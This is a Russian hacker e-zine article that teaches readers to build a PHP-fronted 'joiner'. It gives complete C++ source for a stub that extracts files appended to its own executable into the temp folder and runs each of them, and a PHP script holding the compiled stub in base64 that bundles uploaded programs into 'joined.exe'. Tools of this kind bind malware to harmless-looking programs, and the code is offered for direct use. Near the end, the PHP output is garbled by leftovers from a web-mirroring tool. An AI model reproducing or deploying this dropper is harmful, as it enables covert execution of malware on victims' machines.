Как бы это меня не удивляло, при словах "джойнер на php" у многих возникают эмоции типа "Вау! Как круто! Вот бы исходники посмотреть!" Цель данной статьи - развеять все мифы о этих, с позволенья сказать, скриптах и показать, что они не представляют из себя что-либо сверхестественное. Далее по тексту мы напишем такой джойнер. Разобраться должен даже девятиклассник. Потребуются минимальные знания php и навыки программирования на C++ под Windows.

Лишний раз напомню, что целью данной статьи не является написание мега-крутого джойнера со сменными иконками, упаковками и крипторами в четыре слоя. Работать с Pe-форматом нам тоже не придется (пожелеем девятиклассников :) ). Итак, принци простой: Есть обычный исполняемый файл. Как известно, маздаю будет глупоко чихать, если в его конец что-то дописать. Вот мы и допишим склеиваемые фалы. За головой нашего джойнера будет следовать такая структура:

[Files Count (DWORD)]
[Buffer Size (DWORD)]

[File1 Size (DWORD)]
[File1 Content (Variable)]
[File2 Size (DWORD)]
[File2 Content (Variable)]
............. etc

Где Files Count - число склееных файлов (мы можем склеить их сколько угодно), Buffer Size - размер буфера, который должен выделить под свои нужды джойнер (фактически это поле равно размеру наибольшего из склеиваемых файлов). Далее идет File Count записей Размер:Содержимое. Вот сурец джойнера:


#include "windows.h" #pragma comment(linker, "/ALIGN:4096 /MERGE:.idata=.text /MERGE:.data=.text"); #pragma commant(linker, "/SECTION:.text,EWR"); #define SELF_SIZE 1536 void main() { char SelfName[MAX_PATH]; char CurrDir[MAX_PATH]; char TempPath[MAX_PATH]; char TempName[MAX_PATH]; HANDLE hReadFile; HANDLE hWriteFile; HANDLE hBuff; DWORD JoinedCount; DWORD BuffSize; DWORD FileSize; DWORD ddTemp; int Unique; GetCurrentDirectory(MAX_PATH, CurrDir); GetTempPath(MAX_PATH, TempPath); GetModuleFileName(GetModuleHandle(0), SelfName, MAX_PATH); hReadFile = CreateFile(SelfName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_ALWAYS, 0, NULL); if(hReadFile != INVALID_HANDLE_VALUE) if(GetFileSize(hReadFile, 0) > SELF_SIZE) { SetFilePointer(hReadFile, SELF_SIZE, 0, FILE_BEGIN); ReadFile(hReadFile, &JoinedCount, sizeof(DWORD), &ddTemp, NULL); ReadFile(hReadFile, &BuffSize, sizeof(DWORD), &ddTemp, NULL); hBuff = GlobalAlloc(GMEM_FIXED, BuffSize); Unique = GetTickCount(); while(JoinedCount > 0) { ReadFile(hReadFile, &FileSize, sizeof(DWORD), &ddTemp, NULL); Unique++; wsprintf(TempName, "%s%d.exe", TempPath, Unique); hWriteFile = CreateFile(TempName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); if(hWriteFile == INVALID_HANDLE_VALUE) break; ReadFile(hReadFile, hBuff, FileSize, &ddTemp, 0); WriteFile(hWriteFile, hBuff, FileSize, &ddTemp, 0); CloseHandle(hWriteFile); WinExec(TempName, SW_SHOWNORMAL); JoinedCount--; } GlobalFree(hBuff); CloseHandle(hReadFile); } ExitProcess(0); }


Я надеюсь, что этот код не нуждается в коментариях. Скажу только, что после того, как программа будет собрана, нужно изменить в исходном коде SELF_SIZE на размер бинарника и собрать его снова.

Теперь осталось состряпоть... кхе-кхе... GUI ). Код приведен ниже.

<?php function print_int($i) { echo chr($i & 0xFF).chr(($i >> 8) & 0xFF). chr(($i >> 16) & 0xFF).chr($i >> 24); } $file = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAwAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm 9ncmFtIGNhbm5v". "dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABGwbHZAq DfigKg34oCoN+K". "AqDeihKg34pgv8yKB6Dfiuq/1IoAoN+KUmljaAKg34oAAAAAAAAAAAAAAAAAAAAA". "UEUAAEwBAQC4ZVZEAAAAAAAAAADgAA8BCwEGAAAEAAAAAAAAAA AAAPARAAAAEAAA". "ACAAAAAAQAAAEAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAIAAAAA IAAAAAAAACAAAA". "AAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAAAMEAAAPA AAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkBAAAEgAAAAAAAAAAA AAAAAAAAAAAAAA". "AAAAAAAAAAAudGV4dAAAAKADAAAAEAAAAAQAAAACAAAAAAAAAA AAAAAAAAAgAADg". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlcyVkLm V4ZQAAAABIEAAA". "AAAAAAAAAADCEQAAkBAAAIgQAAAAAAAAAAAAANwRAADQEAAAAA AAAAAAAAAAAAAA". "AAAAAAAAAADYEAAA5hAAAPQQAAD+EAAADBEAABgRAAAoEQAANh EAAEIRAABUEQAA". "YhEAAHARAACGEQAAmhEAAKoRAAAAAAAA0BEAAAAAAADYEAAA5h AAAPQQAAD+EAAA". "DBEAABgRAAAoEQAANhEAAEIRAABUEQAAYhEAAHARAACGEQAAmh EAAKoRAAAAAAAA". "0BEAAAAAAAB9AEV4aXRQcm9jZXNzAIgBR2xvYmFsRnJlZQAA0w JXaW5FeGVjABsA". "Q2xvc2VIYW5kbGUA3wJXcml0ZUZpbGUAbQFHZXRUaWNrQ291bn QAAIEBR2xvYmFs". "QWxsb2MAGAJSZWFkRmlsZQAAagJTZXRGaWxlUG9pbnRlcgAAEg FHZXRGaWxlU2l6". "ZQA0AENyZWF0ZUZpbGVBACQBR2V0TW9kdWxlRmlsZU5hbWVBAA AmAUdldE1vZHVs". "ZUhhbmRsZUEAAGUBR2V0VGVtcFBhdGhBAAD1AEdldEN1cnJlbn REaXJlY3RvcnlB". "AABLRVJORUwzMi5kbGwAAKwCd3NwcmludGZBAFVTRVIzMi5kbG wAAAAAAAAAAAAA". "gewkBAAAjYQkIAMAAFdQaAQBAAD/FcgQQACNjCQgAgAAUWgEAQAA/xXEEEAAjZQk". "HAEAAGgEAQAAUmoA/xXAEEAAUP8VvBBAAGoAagBqBGoAagGNhCQwAQAAaAAAAIBQ". "/xW4EEAAi/iD//8PhCcBAABqAFf/FbQQQAA9AAYAAA+GEwEAAFNVagBqAGgABgAA". "V/8VsBBAAIsdrBBAAI1MJAxqAFGNVCQYagRSV//TjUQkDGoAUI1MJCRqBFFX/9OL". "VCQcUmoA/xWoEEAAiUQkFP8VpBBAAIvoi0QkEIXAD4agAAAAVo1EJBBqAFC NTCQk". "agRRV//TRY2UJCwCAABVUo1EJCxoABBAAFD/FdAQQACDxBCNTCQkagBqAGoCagBq". "AGgAAABAUf8VuBBAAIvwg/7/dE+LRCQci0wkGI1UJBBqAFJQUVf/04tEJByLTCQY". "jVQkEGoAUlBRVv8VoBBAAFb/FZwQQACNVCQkagFS/xWYEEAAi0QkFEiJRCQUD4Vi". "////XotEJBRQ/xWUEEAAV/8VnBBAAF1bagD/FZAQQABfgcQkBAAAw5CQkJCQkJCQ". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA"; $file_size = 1536; if(isset($_POST["files_count"])) { $count = $_POST["files_count"]; $size = $file_size + 8; $max_size = 0; $sizes = array(); for($i = 1; $i <= $count; $i++) if(isset($_FILES["file$i"])) { $tmp = filesize($_FILES["file$i"]["tmp_name"]); $sizes[$i] = $tmp; if($tmp > $max_size) $max_size = $tmp; $size += $tmp + 4; } else die("\$_FILES[\"file$i\"] is not set."); header("Content-Transfer-Encoding: binary"); header("Content-type: application/x-download"); header("Content-Length: $size"); header("Content-Disposition: attachment; filename=\"joined.exe\""); echo base64_decode($file); print_int($count); print_int($max_size); for($i = 1; $i <= $count; $i++) { print_int($sizes[$i]); readfile($_FILES["file$i"]["tmp_name"]); } } else { $count = 0; if(isset($_POST["new_files_count"])) $count = intval($_POST["new_files_count"]); if($count < 2) $count = 2; echo "<form method=post>Files Count: <input type=text ". "name=new_files_count size=2 value=\"$count\">". "<input type=submit value=\"Update\"></form><hr>". "<form method=post enctype=multipart/form-data>". "<input type=hidden name=files_count value=\"$count\">"; for($i = 1; $i <= $count; $i++) echo "File $i: <input type=file name=\"file$i\"><br>"; echo "<input type=submit value=\"Join\"><hr><p align=right>". "Simple PHPJoiner v 0.8 (c) drmist\STNC 2006 | <a href=%22javascript:if(confirm(%27http://xaknotdie.org/%22http://%22. \n\nThis file was not retrieved by Teleport Pro, because it was unavailable, or its retrieval was aborted, or the project was stopped too soon. \n\nDo you want to open it from the server?%27))window.location=%27http://xaknotdie.org/%22http://%22.%27%22 tppabs="http://xaknotdie.org/%22http://%22." "www.security-teams.net\">www.security-teams.net</a> | <a href="index-153.htm" tppabs="http://xaknotdie.org/openteam/3/."\"http://drmist.ru\">drmist.ru</a>"; } ?>

Переменная $file содержит откомпилированный бинарник в base64. Получить ее значение можно простым скриптом



Пирнцип работы скрипта на мой взгляд также не нуждается в пояснении. Фактически это все, что я хотел сказать. Надеюсь среди читателей не найдутся те, кто найдет в этом тексте что-то сложное. Могу только добавить, что на ... эм.. написание этого текста с приготовлением всех сорсов и тестированием у меня ушло что-то в районе часа. Все желающие могут протестировать джойнер, зайдя по ссылке http://drmist.ru/joiner/.

В качестве заключения напомню, что данная статья со всеми исходными кодами является моей интелектуальной собственностью, потому если читателю захочется где-то ее выложить, он должен оставить ссылку на САЙТ НАШЕЙ КОМАНДЫ: http://www.security-teams.net. В противном случае, он не сможет избавится от угрызения совести до последней секунды своего жалкого существования :). Кроме того, автор не несет ответственности за чужие действия в том случае, если материал даннгой статьи будет использован в противозаконных целях. Вся информация дана в ознакомительных целях.



.:: Special for Open Team E-zine ::.

Автор: drmist.